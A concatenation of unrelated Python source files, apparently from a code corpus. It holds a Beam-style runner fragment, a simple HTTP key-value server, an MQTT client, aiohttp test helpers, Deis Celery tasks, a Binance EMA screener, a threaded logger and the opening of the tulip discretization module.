ProcessBundleProgressRequest( instruction_id=self._instruction_id))).get() self._latest_progress = progress_result.process_bundle_progress if self._callback: self._callback(self._latest_progress) except Exception as exn: _LOGGER.error("Bad progress: %s", exn) time.sleep(self._frequency) def stop(self): self._done = True class ControlFuture(object): def __init__(self, instruction_id, response=None): self.instruction_id = instruction_id if response: self._response = response else: self._response = None self._condition = threading.Condition() def is_done(self): return self._response is not None def set(self, response): with self._condition: self._response = response self._condition.notify_all() def get(self, timeout=None): if not self._response: with self._condition: if not self._response: self._condition.wait(timeout) return self._response class FnApiMetrics(metric.MetricResults): def __init__(self, step_monitoring_infos, user_metrics_only=True): """Used for querying metrics from the PipelineResult object. step_monitoring_infos: Per step metrics specified as MonitoringInfos. user_metrics_only: If true, includes user metrics only. """ self._counters = {} self._distributions = {} self._gauges = {} self._user_metrics_only = user_metrics_only self._monitoring_infos = step_monitoring_infos for smi in step_monitoring_infos.values(): counters, distributions, gauges = \ portable_metrics.from_monitoring_infos(smi, user_metrics_only) self._counters.update(counters) self._distributions.update(distributions) self._gauges.update(gauges) def query(self, filter=None): counters = [ MetricResult(k, v, v) for k, v in self._counters.items() if self.matches(filter, k) ] distributions = [ MetricResult(k, v, v) for k, v in self._distributions.items() if self.matches(filter, k) ] gauges = [ MetricResult(k, v, v) for k, v in self._gauges.items() if self.matches(filter, k) ] return { self.COUNTERS: counters, self.DISTRIBUTIONS: distributions, self.GAUGES: gauges } def monitoring_infos(self): # type: () -> List[metrics_pb2.MonitoringInfo] return [ item for sublist in self._monitoring_infos.values() for item in sublist ] class RunnerResult(runner.PipelineResult): def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage): super(RunnerResult, self).__init__(state) self._monitoring_infos_by_stage = monitoring_infos_by_stage self._metrics_by_stage = metrics_by_stage self._metrics = None self._monitoring_metrics = None def wait_until_finish(self, duration=None): return self._state def metrics(self): """Returns a queryable object including user metrics only.""" if self._metrics is None: self._metrics = FnApiMetrics( self._monitoring_infos_by_stage, user_metrics_only=True) return self._metrics def monitoring_metrics(self): """Returns a queryable object including all metrics.""" if self._monitoring_metrics is None: self._monitoring_metrics = FnApiMetrics( self._monitoring_infos_by_stage, user_metrics_only=False) return self._monitoring_metrics
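# --- Illustrative sketch (not part of the original module) ---
# The runner/worker handshake above relies on ControlFuture: the runner pushes
# an InstructionRequest and later blocks on get() until the worker thread
# delivers the matching InstructionResponse via set(). A minimal, hypothetical
# demonstration of that pattern, using only the ControlFuture class defined
# above (never called by the module itself):
def _control_future_demo():
    import threading as _threading
    import time as _time

    fut = ControlFuture('instruction_1')

    def _worker():
        _time.sleep(0.1)            # simulate the SDK worker processing a bundle
        fut.set('bundle finished')  # equivalent of delivering the response

    _threading.Thread(target=_worker).start()
    # get() blocks on the internal Condition until set() is called (or timeout).
    return fut.get(timeout=5)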
kv_server.py
# Copyright 2022 kuizhiqing # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from http.server import HTTPServer import http.server as SimpleHTTPServer from multiprocessing import Process import threading import json class KVHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): with self.server.kv_lock: ret = {} for k, v in self.server.kv.items(): if k.startswith(self.path): ret[k] = v.decode(encoding="utf-8") if ret: self.output(200, json.dumps(ret).encode("utf-8")) else: self.output(404) def do_PUT(self): self.do_POST() def do_POST(self): content_length = int(self.headers['Content-Length'] or 0) try: value = self.rfile.read(content_length) with self.server.kv_lock: self.server.kv[self.path] = value self.output(200) return except: self.output(500) def do_DELETE(self): with self.server.kv_lock: if self.path in self.server.kv: del self.server.kv[self.path] self.output(200) else: self.output(404) def output(self, code, value=''): self.send_response(code) self.send_header("Content-Length", len(value)) self.send_header("Content-Type", "application/json; charset=utf8") self.end_headers() if value: self.wfile.write(value) def log_message(self, format, *args): return class KVServer(HTTPServer, object): def __init__(self, port): super(KVServer, self).__init__(('', port), KVHandler) self.kv_lock = threading.Lock() self.kv = {'/healthy': b'ok'} self.port = port self.stopped = False self.started = False def start(self): self.listen_thread = threading.Thread(target=self.serve_forever) self.listen_thread.start() self.started = True def stop(self): self.shutdown() self.listen_thread.join() self.server_close() self.stopped = True class PKVServer(): def __init__(self, port): self._server = KVServer(port) def start(self): self.proc = Process(target=self._server.start) self.proc.daemon = True self.proc.start() def stop(self): self._server.stop() self.proc.join() @property def started(self): return self._server.started @property def stopped(self): return self._server.stopped if __name__ == '__main__': #kv = PKVServer(8090) kv = KVServer(8090) kv.start() import time #print("serve at 8090 for 600 s") time.sleep(600)
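# --- Illustrative sketch (not part of the original module) ---
# A hypothetical client for the KVServer above, using the third-party
# `requests` package (not a dependency of this file). Keys live under the
# request path: PUT/POST store the raw body, GET returns a JSON object of
# every key that starts with the requested prefix, DELETE removes one key.
def _kv_client_demo(base_url='http://127.0.0.1:8090'):
    import requests

    requests.put(base_url + '/jobs/0', data=b'running')   # store a value
    resp = requests.get(base_url + '/jobs')                # prefix lookup
    print(resp.status_code, resp.json())                   # e.g. {'/jobs/0': 'running'}
    requests.delete(base_url + '/jobs/0')                  # remove the key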
mqtt.py
# coding=utf-8
'''
Python code for connecting to an MQTT server; tested successfully on EasyIoT
and SIoT, implementing message publishing and subscribing.
Written by: 姜浩, 谢作如, 2019.5.7
'''
import threading
import paho.mqtt.client as mqtt
import time

SERVER = "127.0.0.1"        # MQTT server IP
CLIENT_ID = " "             # on SIoT, CLIENT_ID may be left blank
TOPIC = 'DFRobot/linmy'     # the "topic" is "project name/device name"
username = 'siot'           # user name
password = 'dfrobot'        # password


class MqttClient:
    # Note: the client is a class attribute, shared by all MqttClient instances.
    client = mqtt.Client(CLIENT_ID)

    def __init__(self, host, port):
        self._host = host
        self._port = port
        self.client.on_connect = self._on_connect
        self.client.on_message = self._on_message

    def connect(self, username, password):
        self.client.username_pw_set(username, password)
        self.client.connect(self._host, self._port, 60)

    def publish(self, topic, data):
        self.client.publish(str(topic), str(data))

    def loop(self, timeout=None):
        thread = threading.Thread(target=self._loop, args=(timeout,))
        # thread.setDaemon(True)
        thread.start()

    def _loop(self, timeout=None):
        if not timeout:
            self.client.loop_forever()
        else:
            self.client.loop(timeout)

    def _on_connect(self, client, userdata, flags, rc):
        print("\nConnected with result code " + str(rc))
        client.subscribe(TOPIC)

    def _on_message(self, client, userdata, msg):
        print("\nReceived Topic: " + str(msg.topic) + " Message: " + str(msg.payload))


if __name__ == '__main__':
    tick = 0  # the number to send
    client = MqttClient(SERVER, 1883)
    client.connect(username, password)
    client.publish(TOPIC, 'hello')
    client.loop()
    while True:
        client.publish(TOPIC, "value %d" % tick)
        time.sleep(5)  # publish once every 5 seconds
        tick = tick + 1
test_utils.py
"""Utilities shared by tests.""" import cgi import contextlib import gc import email.parser import http.server import json import logging import io import os import re import ssl import sys import threading import traceback import urllib.parse import asyncio import aiohttp from aiohttp import server from aiohttp import helpers def run_briefly(loop): @asyncio.coroutine def once(): pass t = asyncio.Task(once(), loop=loop) loop.run_until_complete(t) @contextlib.contextmanager def run_server(loop, *, listen_addr=('127.0.0.1', 0), use_ssl=False, router=None): properties = {} transports = [] class HttpRequestHandler: def __init__(self, addr): if isinstance(addr, tuple): host, port = addr self.host = host self.port = port else: self.host = host = 'localhost' self.port = port = 0 self.address = addr self._url = '{}://{}:{}'.format( 'https' if use_ssl else 'http', host, port) def __getitem__(self, key): return properties[key] def __setitem__(self, key, value): properties[key] = value def url(self, *suffix): return urllib.parse.urljoin( self._url, '/'.join(str(s) for s in suffix)) class TestHttpServer(server.ServerHttpProtocol): def connection_made(self, transport): transports.append(transport) super().connection_made(transport) def handle_request(self, message, payload): if properties.get('close', False): return if properties.get('noresponse', False): yield from asyncio.sleep(99999) for hdr, val in message.headers.items(getall=True): if (hdr == 'EXPECT') and (val == '100-continue'): self.transport.write(b'HTTP/1.0 100 Continue\r\n\r\n') break if router is not None: body = yield from payload.read() rob = router( self, properties, self.transport, message, body) rob.dispatch() else: response = aiohttp.Response(self.writer, 200, message.version) text = b'Test message' response.add_header('Content-type', 'text/plain') response.add_header('Content-length', str(len(text))) response.send_headers() response.write(text) response.write_eof() if use_ssl: here = os.path.join(os.path.dirname(__file__), '..', 'tests') keyfile = os.path.join(here, 'sample.key') certfile = os.path.join(here, 'sample.crt') sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23) sslcontext.load_cert_chain(certfile, keyfile) else: sslcontext = None def run(loop, fut): thread_loop = asyncio.new_event_loop() asyncio.set_event_loop(thread_loop) if isinstance(listen_addr, tuple): host, port = listen_addr server_coroutine = thread_loop.create_server( lambda: TestHttpServer(keep_alive=0.5), host, port, ssl=sslcontext) else: try: os.unlink(listen_addr) except FileNotFoundError: pass server_coroutine = thread_loop.create_unix_server( lambda: TestHttpServer(keep_alive=0.5), listen_addr, ssl=sslcontext) server = thread_loop.run_until_complete(server_coroutine) waiter = asyncio.Future(loop=thread_loop) loop.call_soon_threadsafe( fut.set_result, (thread_loop, waiter, server.sockets[0].getsockname())) try: thread_loop.run_until_complete(waiter) finally: # call pending connection_made if present run_briefly(thread_loop) # close opened transports for tr in transports: tr.close() run_briefly(thread_loop) # call close callbacks server.close() thread_loop.stop() thread_loop.close() gc.collect() fut = asyncio.Future(loop=loop) server_thread = threading.Thread(target=run, args=(loop, fut)) server_thread.start() thread_loop, waiter, addr = loop.run_until_complete(fut) try: yield HttpRequestHandler(addr) finally: thread_loop.call_soon_threadsafe(waiter.set_result, None) server_thread.join() class Router: _response_version = "1.1" _responses = 
http.server.BaseHTTPRequestHandler.responses def __init__(self, srv, props, transport, message, payload): # headers self._headers = http.client.HTTPMessage() for hdr, val in message.headers.items(getall=True): self._headers.add_header(hdr, val) self._srv = srv self._props = props self._transport = transport self._method = message.method self._uri = message.path self._version = message.version self._compression = message.compression self._body = payload url = urllib.parse.urlsplit(self._uri) self._path = url.path self._query = url.query @staticmethod def define(rmatch): def wrapper(fn): f_locals = sys._getframe(1).f_locals mapping = f_locals.setdefault('_mapping', []) mapping.append((re.compile(rmatch), fn.__name__)) return fn return wrapper def dispatch(self): # pragma: no cover for route, fn in self._mapping: match = route.match(self._path) if match is not None: try: return getattr(self, fn)(match) except Exception: out = io.StringIO() traceback.print_exc(file=out) self._response(500, out.getvalue()) return return self._response(self._start_response(404)) def _start_response(self, code): return aiohttp.Response(self._srv.writer, code) def _response(self, response, body=None, headers=None, chunked=False, write_body=None): r_headers = {} for key, val in self._headers.items(): key = '-'.join(p.capitalize() for p in key.split('-')) r_headers[key] = val encoding = self._headers.get('content-encoding', '').lower() if 'gzip' in encoding: # pragma: no cover cmod = 'gzip' elif 'deflate' in encoding: cmod = 'deflate' else: cmod = '' resp = { 'method': self._method, 'version': '%s.%s' % self._version, 'path': self._uri, 'headers': r_headers, 'origin': self._transport.get_extra_info('addr', ' ')[0], 'query': self._query, 'form': {}, 'compression': cmod, 'multipart-data': [] } if body: # pragma: no cover resp['content'] = body else: resp['content'] = self._body.decode('utf-8', 'ignore') ct = self._headers.get('content-type', '').lower() # application/x-www-form-urlencoded if ct == 'application/x-www-form-urlencoded': resp['form'] = urllib.parse.parse_qs(self._body.decode('latin1')) # multipart/form-data elif ct.startswith('multipart/form-data'): # pragma: no cover out = io.BytesIO() for key, val in self._headers.items(): out.write(bytes('{}: {}\r\n'.format(key, val), 'latin1')) out.write(b'\r\n') out.write(self._body) out.write(b'\r\n') out.seek(0) message = email.parser.BytesParser().parse(out) if message.is_multipart(): for msg in message.get_payload(): if msg.is_multipart(): logging.warning('multipart msg is not expected') else: key, params = cgi.parse_header( msg.get('content-disposition', '')) params['data'] = msg.get_payload() params['content-type'] = msg.get_content_type() cte = msg.get('content-transfer-encoding') if cte is not None: resp['content-transfer-encoding'] = cte resp['multipart-data'].append(params) body = json.dumps(resp, indent=4, sort_keys=True) # default headers hdrs = [('Connection', 'close'), ('Content-Type', 'application/json')] if chunked: hdrs.append(('Transfer-Encoding', 'chunked')) else: hdrs.append(('Content-Length', str(len(body)))) # extra headers if headers: hdrs.extend(headers.items()) if chunked: response.force_chunked() # headers response.add_headers(*hdrs) response.send_headers() # write payload if write_body: try: write_body(response, body) except: return else: response.write(helpers.str_to_bytes(body)) response.write_eof() # keep-alive if response.keep_alive(): self._srv.keep_alive(True)
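# --- Illustrative sketch (not part of the original module) ---
# Routers are plugged into run_server() via its `router=` argument: the test
# server instantiates router(...) for each request and calls dispatch(), which
# matches self._path against the patterns registered with Router.define().
# A hypothetical minimal router built on the class above:
class _EchoRouter(Router):

    @Router.define('^/echo$')
    def echo(self, match):
        # Reply with the standard JSON description of the request.
        self._response(self._start_response(200))


# Typical use inside a test (sketch):
#
#   with run_server(loop, router=_EchoRouter) as httpd:
#       url = httpd.url('echo')
#       ...  # issue requests against `url` with an aiohttp client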
tasks.py
""" Long-running tasks for the Deis Controller API This module orchestrates the real "heavy lifting" of Deis, and as such these functions are decorated to run as asynchronous celery tasks. """ from __future__ import unicode_literals import requests import threading from celery import task from django.conf import settings @task def create_cluster(cluster): cluster._scheduler.setUp() @task def destroy_cluster(cluster): for app in cluster.app_set.all(): app.destroy() cluster._scheduler.tearDown() @task def deploy_release(app, release): containers = app.container_set.all() threads = [] for c in containers: threads.append(threading.Thread(target=c.deploy, args=(release,))) [t.start() for t in threads] [t.join() for t in threads] @task def import_repository(source, target_repository): """Imports an image from a remote registry into our own private registry""" data = { 'src': source, } requests.post( '{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL, target_repository), data=data, ) @task def start_containers(containers): create_threads = [] start_threads = [] for c in containers: create_threads.append(threading.Thread(target=c.create)) start_threads.append(threading.Thread(target=c.start)) [t.start() for t in create_threads] [t.join() for t in create_threads] [t.start() for t in start_threads] [t.join() for t in start_threads] @task def stop_containers(containers): destroy_threads = [] delete_threads = [] for c in containers: destroy_threads.append(threading.Thread(target=c.destroy)) delete_threads.append(threading.Thread(target=c.delete)) [t.start() for t in destroy_threads] [t.join() for t in destroy_threads] [t.start() for t in delete_threads] [t.join() for t in delete_threads] @task def run_command(c, command): release = c.release version = release.version image = '{}:{}/{}'.format(settings.REGISTRY_HOST, settings.REGISTRY_PORT, release.image) try: # pull the image first rc, pull_output = c.run("docker pull {image}".format(**locals())) if rc != 0: raise EnvironmentError('Could not pull image: {image}'.format(**locals())) # run the command docker_args = ' '.join(['--entrypoint=/bin/sh', '-a', 'stdout', '-a', 'stderr', '--rm', image]) escaped_command = command.replace("'", "'\\''") command = r"docker run {docker_args} -c \'{escaped_command}\'".format(**locals()) return c.run(command) finally: c.delete()
binance_pairs_ema.py
import requests
import json
import os
import time
from threading import Thread

from bfxhfindicators import EMA

BASE_URL = 'https://api.binance.com'
TIMEFRAME = '4h'
EMA_PERIODS = [50, 200]

symbols = []
candles = {}
prices = {}
ema_values = {}


def load_candles(sym):
    global candles, prices, BASE_URL
    payload = {
        'symbol': sym,
        'interval': TIMEFRAME,
        'limit': 250
    }
    resp = requests.get(BASE_URL + '/api/v1/klines', params=payload)
    klines = json.loads(resp.content)

    # parse klines and store open, high, low, close and vol only
    parsed_klines = []
    for k in klines:
        k_candle = {
            'open': float(k[1]),
            'high': float(k[2]),
            'low': float(k[3]),
            'close': float(k[4]),
            'vol': float(k[5])
        }
        parsed_klines.append(k_candle)

    candles[sym] = parsed_klines
    index = len(parsed_klines) - 1  # index of latest candle
    prices[sym] = parsed_klines[index]['close']  # save current price


# create results folder if it doesn't exist
if not os.path.exists('results/'):
    os.makedirs('results/')

# start with blank files
open('results/below_50.txt', 'w').close()
open('results/above_50_below_200.txt', 'w').close()
open('results/above_200.txt', 'w').close()

# load symbols information
print('Getting list of USDT trade pairs...')
resp = requests.get(BASE_URL + '/api/v1/ticker/allBookTickers')
tickers_list = json.loads(resp.content)

for ticker in tickers_list:
    if str(ticker['symbol'])[-4:] == 'USDT':
        symbols.append(ticker['symbol'])

# get 4h candles for symbols
print('Loading candle data for symbols...')
for sym in symbols:
    Thread(target=load_candles, args=(sym,)).start()

while len(candles) < len(symbols):
    print('%s/%s loaded' % (len(candles), len(symbols)), end='\r', flush=True)
    time.sleep(0.1)

# calculate EMAs for each symbol
print('Calculating EMAs...')
for sym in candles:
    for period in EMA_PERIODS:
        iEMA = EMA([period])
        lst_candles = candles[sym][:]
        for c in lst_candles:
            iEMA.add(c['close'])
        if sym not in ema_values:
            ema_values[sym] = {}
        ema_values[sym][period] = iEMA.v()

# save filtered EMA results in txt files
print('Saving filtered EMA results to txt files...')
for sym in ema_values:
    ema_50 = ema_values[sym][50]
    ema_200 = ema_values[sym][200]
    price = prices[sym]
    entry = '%s: $%s\n' % (sym, round(price, 3))

    if price < ema_50:
        # symbol is trading below EMA(50)
        with open('results/below_50.txt', 'a') as f:
            f.write(entry)
    elif price > ema_50 and price < ema_200:
        # symbol is trading above EMA(50) but below EMA(200)
        with open('results/above_50_below_200.txt', 'a') as f:
            f.write(entry)
    elif price > ema_200:
        # symbol is trading above EMA(200)
        with open('results/above_200.txt', 'a') as f:
            f.write(entry)

print('All done! Results saved in results folder.')
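# For reference, the values returned by the bfxhfindicators EMA above follow
# the standard exponential-moving-average recurrence. A minimal pure-Python
# sketch of the same calculation (assuming the usual smoothing factor
# 2 / (period + 1) and seeding with the first close) would be:

def ema_sketch(closes, period):
    """Exponential moving average of a list of close prices."""
    alpha = 2.0 / (period + 1)
    value = closes[0]
    for price in closes[1:]:
        value = alpha * price + (1.0 - alpha) * value
    return value

# e.g. ema_sketch([c['close'] for c in candles['BTCUSDT']], 50)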
debug.py
import time
import datetime
import threading


class Debugger:
    thread = None

    def __init__(self):
        self.error_log = 'error_log'
        self.debug_log = 'debug_log'
        self.error_file = None
        self.debug_file = None
        self.files_closing = False
        self.flush_thread = None

    def run(self):
        # Open both log files and start the background flush thread.
        self.error_file = open(self.error_log, 'a+')
        self.debug_file = open(self.debug_log, 'a+')
        self.flush_thread = threading.Thread(target=self.output_flush, args=(10,), daemon=True)
        self.flush_thread.start()

    def output_flush(self, interval):
        # Periodically close and reopen the log files so buffered writes
        # reach disk; writers are paused via the files_closing flag.
        while True:
            time.sleep(interval)
            self.files_closing = True
            time.sleep(0.1)
            self.error_file.close()
            self.debug_file.close()
            self.error_file = open(self.error_log, 'a+')
            self.debug_file = open(self.debug_log, 'a+')
            self.files_closing = False

    def write(self, content, code):
        # Hand the actual write off to a short-lived thread so callers never
        # block while the flush thread has the files closed.
        x = threading.Thread(target=self.safe_write, args=(content, code))
        x.start()

    def safe_write(self, content, code):
        start_time = datetime.datetime.now()
        while self.files_closing:
            time.sleep(0.1)
            if (datetime.datetime.now() - start_time).seconds >= 5:
                # Give up after five seconds and record the dropped entry.
                with open('debugger_timeout', 'a') as f:
                    f.write(f'Timeout at {start_time}, Log ['
                            + ('LOG' if code == 0 else 'ERROR') + '] entry:\n'
                            + content)
                return
        if code == self.DebugCode.LOG:
            self.debug_file.write(content + '\n')
        elif code == self.DebugCode.ERROR:
            self.error_file.write(content + '\n')
        return

    class DebugCode:
        LOG = 0
        ERROR = 1
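# Illustrative usage sketch (not part of the original module): the file names
# and the ten-second flush interval come from the class defaults above.
if __name__ == '__main__':
    dbg = Debugger()
    dbg.run()  # opens the log files and starts the flush thread
    dbg.write('application started', Debugger.DebugCode.LOG)
    dbg.write('something went wrong', Debugger.DebugCode.ERROR)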
discretization.py
# Copyright (c) 2011-2016 by California Institute of Technology # Copyright (c) 2016 by The Regents of the University of Michigan # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder(s) nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, # INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, # STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING # IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # """ Algorithms related to discretization of continuous dynamics. See Also ======== L{find_controller} """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import logging logger = logging.getLogger(__name__) import os import warnings import pprint from copy import deepcopy import multiprocessing as mp import numpy as np from scipy import sparse as sp import polytope as pc from polytope.plot import plot_partition, plot_transition_arrow from tulip import transys as trs from tulip.hybrid import LtiSysDyn, PwaSysDyn from .prop2partition import (PropPreservingPartition, pwa_partition, part2convex) from .feasible import is_feasible, solve_feasible from .plot import plot_ts_on_partition # inline imports: # # inline: import matplotlib.pyplot as plt debug = False class AbstractSwitched(object): """Abstraction of SwitchedSysDyn, with mode-specific and common info. Attributes: - ppp: merged partition, if any Preserves both propositions and dynamics - ts: common TS, if any - ppp2ts: map from C{ppp.regions} to C{ts.states} - modes: dict of {mode: AbstractPwa} - ppp2modes: map from C{ppp.regions} to C{modes[mode].ppp.regions} of the form: {mode: list} where C{list} has same indices as C{ppp.regions} and elements in each C{list} are indices of regions in each C{modes[mode].ppp.regions}. type: dict Each partition corresponds to some mode. (for switched systems) In each mode a L{PwaSysDyn} is active. 
""" def __init__( self, ppp=None, ts=None, ppp2ts=None, modes=None, ppp2modes=None ): if modes is None: modes = dict() self.ppp = ppp self.ts = ts self.ppp2ts = ppp2ts self.modes = modes self.ppp2modes = ppp2modes def __str__(self): s = 'Abstraction of switched system\n' s += str('common PPP:\n') + str(self.ppp) s += str('common ts:\n') + str(self.ts) for mode, ab in self.modes.items(): s += 'mode: ' + str(mode) s += ', with abstraction:\n' + str(ab) return s def ppp2pwa(self, mode, i): """Return original C{Region} containing C{Region} C{i} in C{mode}. @param mode: key of C{modes} @param i: Region index in common partition C{ppp.regions}. @return: tuple C{(j, region)} of: - index C{j} of C{Region} and - C{Region} object in C{modes[mode].ppp.regions} """ region_idx = self.ppp2modes[mode][i] ab = self.modes[mode] return ab.ppp2pwa(region_idx) def ppp2sys(self, mode, i): """Return index of active PWA subsystem in C{mode}, @param mode: key of C{modes} @param i: Region index in common partition C{ppp.regions}. @return: tuple C{(j, subsystem)} of: - index C{j} of PWA C{subsystem} - L{LtiSysDyn} object C{subsystem} """ region_idx = self.ppp2modes[mode][i] ab = self.modes[mode] return ab.ppp2sys(region_idx) def plot(self, show_ts=False, only_adjacent=False): """Plot mode partitions and merged partition, if one exists. For details see L{AbstractPwa.plot}. """ axs = [] color_seed = 0 # merged partition exists ? if self.ppp is not None: for mode in self.modes: env_mode, sys_mode = mode edge_label = {'env_actions':env_mode, 'sys_actions':sys_mode} ax = _plot_abstraction( self, show_ts=False, only_adjacent=False, color_seed=color_seed ) plot_ts_on_partition( self.ppp, self.ts, self.ppp2ts, edge_label, only_adjacent, ax ) axs += [ax] # plot mode partitions for mode, ab in self.modes.items(): ax = ab.plot(show_ts, only_adjacent, color_seed) ax.set_title('Abstraction for mode: ' + str(mode)) axs += [ax] #if isinstance(self.ts, dict): # for ts in self.ts: # ax = ts.plot() # axs += [ax] return axs class AbstractPwa(object): """Discrete abstraction of PWA dynamics, with attributes: - ppp: Partition into Regions. Each Region corresponds to a discrete state of the abstraction type: L{PropPreservingPartition} - ts: Finite transition system abstracting the continuous system. Each state corresponds to a Region in C{ppp.regions}. It can be fed into discrete synthesis algorithms. type: L{FTS} - ppp2ts: bijection between C{ppp.regions} and C{ts.states}. Has common indices with C{ppp.regions}. Elements are states in C{ts.states}. (usually each state is a str) type: list of states - pwa: system dynamics type: L{PwaSysDyn} - pwa_ppp: partition preserving both: - propositions and - domains of PWA subsystems Used for non-conservative planning. If just L{LtiSysDyn}, then the only difference of C{pwa_ppp} from C{orig_ppp} is convexification. type: L{PropPreservingPartition} - orig_ppp: partition preserving only propositions i.e., agnostic of dynamics type: L{PropPreservingPartition} - disc_params: parameters used in discretization that should be passed to the controller refinement to ensure consistency type: dict If any of the above is not given, then it is initialized to None. Notes ===== 1. There could be some redundancy in ppp and ofts, in that they are both decorated with propositions. This might be useful to keep each of them as functional units on their own (possible to change later). 2. The 'Pwa' in L{AbstractPwa} includes L{LtiSysDyn} as a special case. 
""" def __init__( self, ppp=None, ts=None, ppp2ts=None, pwa=None, pwa_ppp=None, ppp2pwa=None, ppp2sys=None, orig_ppp=None, ppp2orig=None, disc_params=None ): if disc_params is None: disc_params = dict() self.ppp = ppp self.ts = ts self.ppp2ts = ppp2ts self.pwa = pwa self.pwa_ppp = pwa_ppp self._ppp2pwa = ppp2pwa self._ppp2sys = ppp2sys self.orig_ppp = orig_ppp self._ppp2orig = ppp2orig # original_regions -> pwa_ppp # ppp2orig -> ppp2pwa_ppp # ppp2pwa -> ppp2pwa_sys self.disc_params = disc_params def __str__(self): s = str(self.ppp) s += str(self.ts) s += 30 * '-' + '\n' s += 'Map PPP Regions ---> TS states:\n' s += self._ppp2other_str(self.ppp2ts) + '\n' s += 'Map PPP Regions ---> PWA PPP Regions:\n' s += self._ppp2other_str(self._ppp2pwa) + '\n' s += 'Map PPP Regions ---> PWA Subsystems:\n' s += self._ppp2other_str(self._ppp2sys) + '\n' s += 'Map PPP Regions ---> Original PPP Regions:\n' s += self._ppp2other_str(self._ppp2orig) + '\n' s += 'Discretization Options:\n\t' s += pprint.pformat(self.disc_params) +'\n' return s def ts2ppp(self, state): region_index = self.ppp2ts.index(state) region = self.ppp[region_index] return (region_index, region) def ppp2trans(self, region_index): """Return the transition set constraint and active subsystem, for non-conservative planning. """ reg_idx, pwa_region = self.ppp2pwa(region_index) sys_idx, sys = self.ppp2sys(region_index) return pwa_region, sys def ppp2pwa(self, region_index): """Return dynamics and predicate-preserving region and its index for PWA subsystem active in given region. The returned region is the C{trans_set} used for non-conservative planning. @param region_index: index in C{ppp.regions}. @rtype: C{(i, pwa.pwa_ppp[i])} """ j = self._ppp2pwa[region_index] pwa_region = self.pwa_ppp[j] return (j, pwa_region) def ppp2sys(self, region_index): """Return index and PWA subsystem active in indexed region. Semantics: j-th sub-system is active in i-th Region, where C{j = ppp2pwa[i]} @param region_index: index in C{ppp.regions}. @rtype: C{(i, pwa.list_subsys[i])} """ # LtiSysDyn ? if self._ppp2sys is None: return (0, self.pwa) subsystem_idx = self._ppp2sys[region_index] subsystem = self.pwa.list_subsys[subsystem_idx] return (subsystem_idx, subsystem) def ppp2orig(self, region_index): """Return index and region of original partition. The original partition is w/o any dynamics, not even the PWA domains, only the polytopic predicates. @param region_index: index in C{ppp.regions}. @rtype: C{(i, orig_ppp.regions[i])} """ j = self._ppp2orig[region_index] orig_region = self.orig_ppp[j] return (j, orig_region) def _ppp2other_str(self, ppp2other): if ppp2other is None: return '' s = '' for i, other in enumerate(ppp2other): s += '\t\t' + str(i) + ' -> ' + str(other) + '\n' return s def _debug_str_(self): s = str(self.ppp) s += str(self.ts) s += '(PWA + Prop)-Preserving Partition' s += str(self.pwa_ppp) s += 'Original Prop-Preserving Partition' s += str(self.orig_ppp) return s def plot(self, show_ts=False, only_adjacent=False, color_seed=None): """Plot partition and optionally feasible transitions. @param show_ts: plot feasible transitions on partition @type show_ts: bool @param only_adjacent: plot feasible transitions only between adjacent regions. This reduces clutter, but if horizon > 1 and not all horizon used, then some transitions could be hidden. 
@param only_adjacent: bool """ ax = _plot_abstraction(self, show_ts, only_adjacent, color_seed) return ax def verify_transitions(self): logger.info('verifying transitions...') for from_state, to_state in self.ts.transitions(): i, from_region = self.ts2ppp(from_state) j, to_region = self.ts2ppp(to_state) trans_set, sys = self.ppp2trans(i) params = {'N', 'close_loop', 'use_all_horizon'} disc_params = {k:v for k,v in self.disc_params.items() if k in params} s0 = solve_feasible(from_region, to_region, sys, trans_set=trans_set, **disc_params) msg = str(i) + ' ---> ' + str(j) if not from_region <= s0: logger.error('incorrect transition: ' + msg) isect = from_region.intersect(s0) ratio = isect.volume /from_region.volume logger.error('intersection volume: ' + str(ratio) + ' %') else: logger.info('correct transition: ' + msg) def _plot_abstraction(ab, show_ts, only_adjacent, color_seed): if ab.ppp is None or ab.ts is None: warnings.warn('Either ppp or ts is None.') return if show_ts: ts = ab.ts ppp2ts = ab.ppp2ts else: ts = None ppp2ts = None ax = ab.ppp.plot( ts, ppp2ts, only_adjacent=only_adjacent, color_seed=color_seed ) #ax = self.ts.plot() return ax def discretize( part, ssys, N=10, min_cell_volume=0.1, closed_loop=True, conservative=False, max_num_poly=5, use_all_horizon=False, trans_length=1, remove_trans=False, abs_tol=1e-7, plotit=False, save_img=False, cont_props=None, plot_every=1, simu_type='bi' ): """Refine the partition via bisimulation or dual-simulation algorithms, and establish transitions based on reachability analysis. Reference ========= U{[NOTM12] <https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>} 